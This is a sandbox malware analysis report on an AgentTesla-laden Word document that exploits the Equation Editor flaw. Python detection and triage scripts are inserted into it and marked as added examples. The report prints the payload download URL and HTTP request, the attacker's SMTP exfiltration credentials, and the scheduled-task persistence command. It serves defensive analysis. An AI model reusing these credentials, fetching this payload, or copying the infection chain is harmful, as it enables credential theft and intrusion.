
Windows Analysis Report PAYMENT ADVICE.doc

Overview

General Information

Sample Name: PAYMENT ADVICE.doc
Analysis ID: 452655
MD5: 71af183490ef5c747eb3b6a1417c8f33
SHA1: cbf5c744909fb1978d8bbadb3b1377e7b364f90d
SHA256: fd1d1d4f70fb3b258e798ba9ac66abd6ad9d9de16b4b2204f55519ea59eb7d12
Tags: doc

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected AgentTesla
Contains functionality to register a low level keyboard hook
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for dropped file
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Uses schtasks.exe or at.exe to add and modify task schedules
Adds / modifies Windows certificates
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Yara detected Credential Stealer

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 1320 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 2764 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • merciesxdncdc.exe (PID: 3040 cmdline: C:\Users\user\AppData\Roaming\merciesxdncdc.exe MD5: E85A0E1E81ACBCEA6A0E10EEEDF32F6D)
      • schtasks.exe (PID: 2564 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JxCmQoa' /XML 'C:\Users\user\AppData\Local\Temp\tmp2E52.tmp' MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • merciesxdncdc.exe (PID: 2728 cmdline: C:\Users\user\AppData\Roaming\merciesxdncdc.exe MD5: E85A0E1E81ACBCEA6A0E10EEEDF32F6D)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "max.mccanna@metaltek.me", "Password": "GODGRACE12345", "Host": "mail.privateemail.com"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.2347741002.00000000028A5000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000007.00000002.2347741002.00000000028A5000.00000004.00000001.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000007.00000002.2346238680.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000007.00000002.2346238680.0000000000402000.00000040.00000001.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |
00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Unpacked PEs

Source | Rule | Description | Author | Strings
7.2.merciesxdncdc.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
7.2.merciesxdncdc.exe.400000.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security |

Sigma Overview

Exploits:

Sigma detected: EQNEDT32.EXE connecting to internet
Source: Network Connection; Author: Joe Security; Data: DestinationIp: 104.21.27.166, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2764, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2764, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okilo[1].exe

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started; Author: Florian Roth; Data: Command: C:\Users\user\AppData\Roaming\merciesxdncdc.exe, CommandLine: C:\Users\user\AppData\Roaming\merciesxdncdc.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\merciesxdncdc.exe, NewProcessName: C:\Users\user\AppData\Roaming\merciesxdncdc.exe, OriginalFileName: C:\Users\user\AppData\Roaming\merciesxdncdc.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2764, ProcessCommandLine: C:\Users\user\AppData\Roaming\merciesxdncdc.exe, ProcessId: 3040

Jbx Signature Overview

AV Detection:

Antivirus detection for URL or domain
Source: http://maritradeshipplng.com/wayss/okilo.exe; Avira URL Cloud: Label: malware
Found malware configuration
Source: 7.2.merciesxdncdc.exe.400000.0.unpack; Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "max.mccanna@metaltek.me", "Password": "GODGRACE12345", "Host": "mail.privateemail.com"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okilo[1].exe; ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Roaming\JxCmQoa.exe; ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe; ReversingLabs: Detection: 23%
Multi AV Scanner detection for submitted file
Source: PAYMENT ADVICE.doc; ReversingLabs: Detection: 26%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okilo[1].exe; Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\JxCmQoa.exe; Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\user\AppData\Roaming\merciesxdncdc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Users\user\AppData\Roaming\merciesxdncdc.exe
Source: unknown; Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: global traffic; DNS query: name: maritradeshipplng.com
Source: global traffic; TCP traffic: 192.168.2.22:49167 -> 104.21.27.166:80
Source: global traffic; TCP traffic: 192.168.2.22:49168 -> 198.54.122.60:587
Source: global traffic; HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Thu, 22 Jul 2021 15:30:49 GMT
  Content-Type: application/octet-stream
  Content-Length: 918016
  Connection: keep-alive
  Last-Modified: Thu, 22 Jul 2021 07:16:32 GMT
  ETag: "e0200-5c7b11105d9f8"
  Accept-Ranges: bytes
  CF-Cache-Status: DYNAMIC
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A4WScKmZaLuRICl5Vg8CWsrWHYZxehHOeC9R%2Fs8kP8xwh%2F0GSl%2F6oRcZSoMzklCMUv%2B2QB5AuT7aOfp81JZ0a8ZaFRiQxuOa%2F2x4XKv8LFBLHelWLzwkMQ8813jnYWu9lWjtKT5SQCE%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 672db66479d040e9-LHR
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELy`Vnu @ @ uK` H.texttU V `.sdata
Source: Joe Sandbox View; IP Address: 104.21.27.166
Source: Joe Sandbox View; IP Address: 198.54.122.60
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: global traffic; HTTP traffic detected:
  GET /wayss/okilo.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: maritradeshipplng.com
  Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE; File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B5F1B80B-61BE-41BF-89DB-AF92964D1C77}.tmp
Source: merciesxdncdc.exe, 00000007.00000002.2351540705.00000000061F0000.00000004.00000001.sdmp; String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown; DNS traffic detected: queries for: maritradeshipplng.com
                Source: merciesxdncdc.exe, 00000007.00000002.2351571827.000000000621B000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: https://www.catcert.net/verarrel05
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
                Source: merciesxdncdc.exe, 00000007.00000003.2226041475.0000000007EFC000.00000004.00000001.sdmpString found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E
                Source: merciesxdncdc.exe, 00000007.00000003.2226569251.000000000627F000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.hu/docs/
                Source: merciesxdncdc.exe, 00000007.00000003.2226277785.000000000626E000.00000004.00000001.sdmpString found in binary or memory: https://www.netlock.net/docs
                Source: merciesxdncdc.exe, 00000007.00000002.2346238680.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                Source: merciesxdncdc.exe, 00000007.00000002.2347049705.0000000002461000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
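Most of the strings in the list above are X.509 extension URLs (CPS pointers, CRL distribution points, OCSP responders) scraped from certificate data in the process's memory, with the next ASN.1 byte glued on by the string scanner ("cps0", "crl0E", "ocsp0-"). Only a couple of entries are worth treating as indicators. The script below is an added example, not part of the Joe Sandbox report: it normalises the scanner tails, deduplicates, and separates certificate boilerplate from candidate IOCs. The path and host marker lists are this example's own heuristics, and the sample input is a constructed subset of the report's strings.

```python
"""Triage of the sandbox's "String found in binary or memory" URL list.

Added example, not part of the Joe Sandbox report. The marker lists below are
assumptions made for this example, not the sandbox's own logic.
"""
import re
from urllib.parse import urlparse

# Constructed sample: a subset of the strings listed in the report above.
SAMPLE_STRINGS = [
    "http://www.quovadisglobal.com/cps0",
    "http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl",
    "https://ocsp.quovadisoffshore.com0",
    "https://sectigo.com/CPS0",
    "https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0E",
    "https://www.catcert.net/verarrel05",
    "http://www.wellsfargo.com/certpolicy0",
    "http://www.valicert.com/1",
    "https://N9CITA5Q9HG.org",
    "https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip",
    "https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha",
]

# Path fragments typical of certificate policy / revocation URLs (assumption).
PATH_MARKERS = re.compile(
    r"(cps|crl|ocsp|certpolicy|repository|policy|normativa|guidelines|/docs|/rca/|/juur/)",
    re.IGNORECASE,
)
# Host fragments typical of the certificate authorities seen in this report (assumption).
HOST_MARKERS = re.compile(
    r"(cert|trust|ocsp|quovadis|sectigo|comodo|netlock|valicert|e-szigno|sk\.ee|"
    r"ssc\.lt|rtr\.at|registradores|rootca|sia\.it)",
    re.IGNORECASE,
)
# Trailing ASN.1 tag/length bytes the string scanner appended to a URL
# ("cps0", "crl0E", "ocsp0-", "com/1").
ASN1_TAIL = re.compile(r"0[0-9A-Z\-]?$|/1$")
# Template placeholder glued onto a URL, as in "...zip%tordir%%ha".
TEMPLATE_TAIL = re.compile(r"%[A-Za-z]+%.*$")


def normalize(s: str) -> str:
    """Strip scanner and template tails so variants of one URL collapse."""
    s = TEMPLATE_TAIL.sub("", s.strip())
    return ASN1_TAIL.sub("", s)


def classify(strings):
    """Split strings into (certificate_noise, candidate_iocs), deduplicated."""
    noise, candidates, seen = [], [], set()
    for raw in strings:
        url = normalize(raw)
        if url in seen:
            continue
        seen.add(url)
        parsed = urlparse(url)
        if parsed.scheme not in ("http", "https") or not parsed.netloc:
            continue  # not something the process could contact as written
        if PATH_MARKERS.search(parsed.path) or HOST_MARKERS.search(parsed.netloc):
            noise.append(url)
        else:
            candidates.append(url)
    return noise, candidates


if __name__ == "__main__":
    noise, candidates = classify(SAMPLE_STRINGS)
    print(f"{len(noise)} certificate-policy strings discarded")
    for url in candidates:
        print("review:", url)
```

On the sample, the two survivors are the `N9CITA5Q9HG.org` host and the Tor Browser bundle download; the latter appears in memory next to a `%tordir%` placeholder, so the sample carries code to fetch and unpack Tor. Those are the strings to check against the report's network sections. Real URLs can legitimately end in a digit, so the tail stripping is a heuristic to review rather than apply blindly.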

                Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to register a low level keyboard hook
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Code function: 7_2_0047865C SetWindowsHookExW 0000000D,00000000,?,? (idHook 0x0D is WH_KEYBOARD_LL; the hook procedure and module arguments were not resolved statically)
Installs a global keyboard hook
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Windows user hook set: 0 keyboard low level C:\Users\user\AppData\Roaming\merciesxdncdc.exe (thread ID 0, so the hook receives keystrokes from every thread on the desktop)
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Window created: window name: CLIPBRDWNDCLASS (the window class ole32 registers for OLE clipboard access; benign OLE-initialised processes create it too, so on its own it only shows the process touched the clipboard API)

                System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\merciesxdncdc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\okilo[1].exe
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Memory allocated: 76E20000 page execute and read and write (logged twice)
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Memory allocated: 76D20000 page execute and read and write (logged twice)
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Code function: 7_2_00265338
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Code function: 7_2_00266350
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Code function: 7_2_00265680
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Code function: 7_2_0026EF20
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Code function: 7_2_002620AB
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Code function: 7_2_00470B70
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Code function: 7_2_00479D10
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Code function: 7_2_0047D119
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Code function: 7_2_00476580
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Code function: 7_2_004773A8
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Code function: 7_2_0047D6F8
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Code function: 7_2_0047EF49
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Code function: 7_2_004779C8
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Code function: 7_2_00482AD0
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Code function: 7_2_00480683
Source: okilo[1].exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: merciesxdncdc.exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: JxCmQoa.exe.4.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: okilo[1].exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: merciesxdncdc.exe.2.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: JxCmQoa.exe.4.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: okilo[1].exe.2.dr, aXR39HWJ4x0q7MGLxy/O957nfmxJOySU8vkRf.cs | Cryptographic APIs: 'CreateDecryptor'
Source: merciesxdncdc.exe.2.dr, aXR39HWJ4x0q7MGLxy/O957nfmxJOySU8vkRf.cs | Cryptographic APIs: 'CreateDecryptor'
Source: JxCmQoa.exe.4.dr, aXR39HWJ4x0q7MGLxy/O957nfmxJOySU8vkRf.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 4.0.merciesxdncdc.exe.9d0000.0.unpack, aXR39HWJ4x0q7MGLxy/O957nfmxJOySU8vkRf.cs | Cryptographic APIs: 'CreateDecryptor'
Source: 7.2.merciesxdncdc.exe.9d0000.1.unpack, aXR39HWJ4x0q7MGLxy/O957nfmxJOySU8vkRf.cs | Cryptographic APIs: 'CreateDecryptor'
Source: classification engine | Classification label: mal100.troj.spyw.expl.evad.winDOC@8/16@11/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$YMENT ADVICE.doc
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Mutant created: \Sessions\1\BaseNamedObjects\fKdScoFaGrq
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRC5ED.tmp
Source: C:\Windows\SysWOW64\schtasks.exe | Console Write: ................................H.......(.P.............\.......d...............................................................................
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll (logged twice)
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | WMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor (identical query logged 11 times)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts (logged twice)
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | File read: C:\Windows\System32\drivers\etc\hosts (logged twice)
Source: PAYMENT ADVICE.doc | ReversingLabs: Detection: 26%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\merciesxdncdc.exe C:\Users\user\AppData\Roaming\merciesxdncdc.exe
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Process created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JxCmQoa' /XML 'C:\Users\user\AppData\Local\Temp\tmp2E52.tmp'
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Process created: C:\Users\user\AppData\Roaming\merciesxdncdc.exe C:\Users\user\AppData\Roaming\merciesxdncdc.exe
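The process-creation entries above are the part of this report that translates most directly into detection logic: Equation Editor spawning a binary in %AppData%, that binary registering a scheduled task from an XML file in %Temp%, and the binary re-launching itself. The script below is an added example, not part of the Joe Sandbox report: it runs three such rules over the report's entries, transcribed into the (parent image, child image, child command line) shape an EDR exports. The rule names, the user-writable path heuristic and the sample records are this example's own.

```python
"""Detection logic over the "Process created" entries above.

Added example, not part of the Joe Sandbox report. Rule names and path
heuristics are assumptions made for this example.
"""
import re

# Constructed sample, transcribed from the report's process-creation lines.
EVENTS = [
    ("unknown",
     r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     r"'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding"),
    ("unknown",
     r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     r"'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding"),
    (r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     r"C:\Users\user\AppData\Roaming\merciesxdncdc.exe",
     r"C:\Users\user\AppData\Roaming\merciesxdncdc.exe"),
    (r"C:\Users\user\AppData\Roaming\merciesxdncdc.exe",
     r"C:\Windows\SysWOW64\schtasks.exe",
     r"'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JxCmQoa' /XML 'C:\Users\user\AppData\Local\Temp\tmp2E52.tmp'"),
    (r"C:\Users\user\AppData\Roaming\merciesxdncdc.exe",
     r"C:\Users\user\AppData\Roaming\merciesxdncdc.exe",
     r"C:\Users\user\AppData\Roaming\merciesxdncdc.exe"),
]

# Equation Editor is the process exploited by CVE-2017-11882 / CVE-2018-0802
# and has no legitimate reason to create child processes.
EXPLOIT_HOSTS = {"eqnedt32.exe"}
# Directories a standard user can write to (assumption; extend for your estate).
USER_WRITABLE = re.compile(r"\\(?:users\\[^\\]+\\appdata|programdata|users\\public)\\", re.IGNORECASE)
TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\", re.IGNORECASE)


def image_name(path: str) -> str:
    """Lower-cased file name of an image path, so SysWOW64 and System32 compare equal."""
    return path.rsplit("\\", 1)[-1].lower()


def switch_value(cmdline: str, switch: str):
    """Value after a schtasks switch, whether 'quoted', "quoted" or bare."""
    m = re.search(re.escape(switch) + r"\s+(?:'([^']*)'|\"([^\"]*)\"|(\S+))",
                  cmdline, re.IGNORECASE)
    return next((g for g in m.groups() if g is not None), None) if m else None


def triage(events):
    """Return one finding dict per matched rule, in event order."""
    findings = []
    for parent, child, cmdline in events:
        if image_name(parent) in EXPLOIT_HOSTS:
            findings.append({
                "rule": "equation-editor-spawned-process",
                "child": child,
                "child_in_user_writable_dir": bool(USER_WRITABLE.search(child)),
            })
        if image_name(child) == "schtasks.exe" and re.search(r"/create\b", cmdline, re.IGNORECASE):
            xml = switch_value(cmdline, "/XML")
            findings.append({
                "rule": ("scheduled-task-created-by-user-writable-binary"
                         if USER_WRITABLE.search(parent) else "scheduled-task-created"),
                "task": switch_value(cmdline, "/TN"),
                "xml": xml,
                "xml_in_temp": bool(xml and TEMP_DIR.search(xml)),
            })
        if parent.lower() == child.lower():
            # The same image re-launched by itself: consistent with the report's
            # suspended-mode / PE injection signatures, but confirm with
            # memory-write telemetry before acting on it.
            findings.append({"rule": "self-spawn", "image": child})
    return findings


if __name__ == "__main__":
    for finding in triage(EVENTS):
        print(finding)
```

Two details of the report matter for writing the real rule. EQNEDT32.EXE is listed with parent "unknown" because it is started as an out-of-process COM server (the `-Embedding` switch), not as a child of WINWORD.EXE, so key the rule on EQNEDT32.EXE as the parent rather than on Word as a grandparent. And the 32-bit dropper names `System32\schtasks.exe` on its command line while the image actually run is `SysWOW64\schtasks.exe` (WoW64 file-system redirection), which is why the rule compares file names rather than full paths.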
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\merciesxdncdc.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: initial sample | Static PE information: section name: .text entropy: 7.56992954159 (identical entry listed three times in the report)
Source: okilo[1].exe.2.dr, TYrkToaGEMpjujrFga/prFipO63mgI0yvrVyq.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'T4ltQqiAVA', 'y5ALwKxnOC', 'SPFLlBsnwk', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl', 'Q5eLWq4DlT', 'YDGLJl8xAQ'
Source: okilo[1].exe.2.dr, SxfIUXVJdgBjNDLFNB/AM2hB8Lor7USiIUZxs.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'vYjtFVkHe8', 'hSbFCsIf9U', 'VBYFGHvDmK', 'H6tFAkBj2Z', 'd1kFDWfdZN', 'L3LFTMp8Vp', 'QvMFQUJcSm', 'Xg0FwSp5eu'
Source: okilo[1].exe.2.dr, ngYh84jGCP5wkphDFk5/yEIfrdj7Dt1Iw9K447j.cs | High entropy of concatenated method names: '.ctor', 'q9OaGjku7c', 'TJ7aAv00Et', 'f0jaDqJSk2', 'qBHaTNRD8W', 'xkNaQK4wah', 'rNpaw40VDI', 'CLMal09RDm', 'VSDaJ3xt4v', 'nGdazASDKU'
Source: okilo[1].exe.2.dr, okG58OBUEjZS4DZJG8/c2esVpS6KesUCjCATw.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'bbJZhccJiR', 'WlYYiQ9SWm', 'N60YcfEWYd', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl', 'Q5eLWq4DlT', 'fbB55WM1tB'
Source: okilo[1].exe.2.dr, Q7gT9wnkWoJQtDsXhx/z2cKe65WbGPGIjxmwr.cs | High entropy of concatenated method names: 'GeLovehHWr', 'Fknosk0xkT', 'UkPo0qs5Tx', 'gW5oEr6ndm', 'Fnco8evmdm', 'KcsofG2qCq', 'bNZormYp4J', 'JyIoi8qVIn', 'V46omQE60N', 'IRnoIISvIs'
Source: okilo[1].exe.2.dr, LNBaGnEQA3vyBDvVVi/em9cs2DYHr6JrqXilP.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'r1dZFhqXD1', 'YUHZLREAL5', 'HqoZ5K4kGc', 'TeeZY8InhQ', 'QrFZrlH2LO', 'g2XLMABbM1', 'nscLOcnG4I', 'E7dLn5AIMl'
Source: okilo[1].exe.2.dr, YIrq8QHhDSfadQYNKS/xKDYPZQDg30Ao09YpT.cs | High entropy of concatenated method names: '.ctor', 'Dispose', 'y7xNDvof1h', 'Q435Ja1njk', 'UkP5zqs5Tx', 'gW5Ybr6ndm', 'ET3Y4eM0Ov', 'FncYoevmdm', 'KcsYUG2qCq', 'JyIYt8qVIn'
